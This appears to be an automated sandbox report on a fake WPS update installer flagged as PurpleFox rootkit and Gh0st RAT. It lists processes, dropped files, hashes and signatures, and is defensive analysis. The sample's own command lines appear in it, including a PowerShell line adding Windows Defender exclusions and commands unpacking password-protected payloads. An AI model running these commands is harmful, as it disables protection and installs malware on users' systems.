N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
N/A N/A C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: 35 N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2180 wrote to memory of 2088 N/A C:\Windows\system32\msiexec.exe C:\Windows\system32\MsiExec.exe
PID 2088 wrote to memory of 2936 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 2936 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 2936 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1088 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2088 wrote to memory of 1088 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 2088 wrote to memory of 1088 N/A C:\Windows\system32\MsiExec.exe C:\Windows\System32\cmd.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 844 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1088 wrote to memory of 672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1088 wrote to memory of 672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\PING.EXE
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 1088 wrote to memory of 2144 N/A C:\Windows\System32\cmd.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 1608 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe
PID 2088 wrote to memory of 612 N/A C:\Windows\system32\MsiExec.exe C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Windows\system32\msiexec.exe

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\system32\DrvInst.exe

DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "0000000000000588" "00000000000005B0"

C:\Windows\system32\MsiExec.exe

C:\Windows\system32\MsiExec.exe -Embedding A5A41B0E270329F1C0B286E9D77DBADF M Global\MSI0000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\TransformOptimisticContributor','C:\Program Files','C:\Program Files'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y & ping 127.0.0.1 -n 2 & start /min "" "C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw" -o"C:\Program Files\TransformOptimisticContributor\" -p"03621GQD}PR[O^Dmi;;h" -y

C:\Windows\system32\PING.EXE

ping 127.0.0.1 -n 2

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

"C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe" x "C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL" -x!1_WSEcydALszNI.exe -x!sss -x!1_OzasXnwPtTbfCAAsrowrLIIDEPUHpa.exe -x!1_ -x!1_ -x!sa -o"C:\Program Files\TransformOptimisticContributor\" -p"93629#*_tvw?-L5@gQl=" -y

C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe

"C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe" -number 177 -file file3 -mode mode3

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

"C:\Program Files\TransformOptimisticContributor\wpsupdate.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 im.qq.com udp
US 8.8.8.8:53 updatepro.wps.cn udp

Files

memory/2088-12-0x00000000001E0000-0x00000000001F0000-memory.dmp

memory/2936-17-0x000000001B210000-0x000000001B4F2000-memory.dmp

memory/2936-18-0x0000000002270000-0x0000000002278000-memory.dmp

C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe

MD5 c31c4b04558396c6fabab64dcf366534
SHA1 fa836d92edc577d6a17ded47641ba1938589b09a
SHA256 9d182f421381429fd77598feb609fefb54dcaef722ddbf5aa611b68a706c10d3
SHA512 814dcbc1d43bc037dadc2f3f67856dd790b15fc1b0c50fa74a169c8cc02cdc79d44f1f10e200ef662eee20cd6b5ca646ec4e77673e3fe3cb7dfb7649243f6e99

C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw

MD5 831ff4029b30419da4ac4d32bf8ff05c
SHA1 8c121d0cd017ce5f7ca8cbf6abd8909b2fe445bc
SHA256 ab281716242897be222c1d4cc979fd5de9e7d1cde56e70ac1010e6b3dc76826d
SHA512 17f2efdb891dcf9ceacb8b24801ec59866f969baa55d1c92c15a7150c13f18cc3f481984b5971456e1ad0f204db016698bfe012c086ffa2028582c1d9302a8c5

C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL

MD5 d045828473a8165effd59a97232e6107
SHA1 f86bd9763d6c70ec3ca79134598de4fa44c6bc94
SHA256 9aaae0f7b3bdab287ad703c7eb4baa1a0746b6d353e57ae74d985b10a2102016
SHA512 07e77aa6a433d4541d80276d37e682012509b480a6861f9fbe3cd89929b352d6754cc649526f95c4bd76cf4e1c8bceb275a0217c38193ab88891166934d79659

C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe

MD5 fb22fb79f366c65257b7adb24c70d843
SHA1 ca6d29a4806d52350e1a50c7b71526dfaab2d525
SHA256 44f2ea5b5dd47fc256a341dee1d2dacfc24adba395a49fd8c4ad3613bfe2d43d
SHA512 c4dfb9273bd937f5480646e12d77073a476719f1f15ee5885e0999f0bbc68f80b1909489f7bd78a3bfb4687a55442f655f4538fda20afe4a7b87623e9bdfe7d9

C:\Program Files\TransformOptimisticContributor\wpsupdate.exe

MD5 57dadd6a929f64c2b1efe2d52c1c4985
SHA1 962cb227f81f885f23826c3e040aa9dbc97659cf
SHA256 996b5d59cce7955b4374bd00d83c422d3a1d9ffebba59c66074c37ab28cfaeb5
SHA512 3f64c35e72698ea6a7e708a4367277f3ab62c27f0652e0c55bab6e02239ee37c4f0a21503c0688301fb77bbf8e59e3c5c8aa2df8d62a4ab8a9b9cdf6f0a775cf

C:\Config.Msi\f779178.rbs

MD5 ea9c96d2913d4fbcefe1cc0e1b580fa9
SHA1 1a38abb197532eac75fc27b259e6831be18205e8
SHA256 2611dd6940254a9db0963e27ef7eec2fdd591cbcf76435898f4d2004b8d21e42
SHA512 f3b44809c4949991187b5972e7f8f53ead852b377c1a3e8e52c5c955b31b12cf9da5302c9af13f932442abe867228916b265ddaef32f58d8f51d6ac89dac3cf6

C:\Windows\Installer\f779176.msi

MD5 ef294458016f546c5eebd07d2dd98bad
SHA1 66bb14f670055272e12899d401b8668cad15fac9
SHA256 c17c018f5df7a413dc053a325b6c291c9cd84f1b9e2415ffe205e02a7e5d6b4a
SHA512 97ee150f49bb587147f30d2215174f5376420abd5d659a2c68d58bc67f823715030cc328eab7e11623f4ee8504f1f080ceb44ac2d6fca7c636ea8d7c936f0333

memory/1608-62-0x0000000001F30000-0x0000000001F5F000-memory.dmp

C:\Users\Admin\AppData\Roaming\kingsoft\office6\log\update\wpsupdate_2024_11_19.log

MD5 389392e8cb2a84e9ae0e9e501d9bc0bb
SHA1 bb76285ed018efe778b9bd1ca7b6e5e95a38a390
SHA256 38cfc855bbf0b5ea523f92b78195f04a043123d9093f176a72f73539f92fbe45
SHA512 9bd81bc468bfaea6b0ae437937cf21c4eeb1136125a3e742a405f4c0e0297ee51c43bcb1fcfb2b5615f5643bd73d2605a0c5d5853c17bd1b324137426f0741ea

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-19 04:50

Reported

2024-11-19 04:53

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

152s

Command Line

msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\wpsupdate.msi

Signatures

Detect PurpleFox Rootkit

rootkit
Description Indicator Process Target
N/A N/A N/A N/A

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

PurpleFox

rootkit trojan purplefox

Purplefox family

purplefox

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\nKecPJAaIeFB.exe.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Windows\System32\MsiExec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\YRtKSPCVXxSCmPuaAzactTPSddUXyw C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\pvugBgEMyjnfIRZnnRolAMMekSRFAr C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A
File created C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WhlKFlLXxHUitNNcNwtpUJDzrKytNL C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.wrapper.log C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.exe N/A
File created C:\Program Files\TransformOptimisticContributor\wpsupdate.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\WSEcydALszNI C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.vbs C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
File created C:\Program Files\TransformOptimisticContributor\VC_redist.x64.exe C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\nKecPJAaIeFB.xml C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File opened for modification C:\Program Files\TransformOptimisticContributor\2_WSEcydALszNI.exe C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
File created C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe C:\Windows\System32\MsiExec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Installer\MSIC68C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c536.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57c534.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e57c534.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{5E7ABEF0-9D09-49C1-952F-E73FA3349D07} C:\Windows\system32\msiexec.exe N/A

Event Triggered Execution: Installer Packages

persistence privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\msiexec.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\wpsupdate.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\WSEcydALszNI.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files\TransformOptimisticContributor\QxbnJjybITIHnXwFgsfiCRpWIdJkGQ.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\cmd.exe N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters C:\Windows\system32\vssvc.exe N/A
Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr C:\Windows\system32\vssvc.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000001a73a27760024bf60000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800001a73a2770000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809001a73a277000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d1a73a277000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000001a73a27700000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
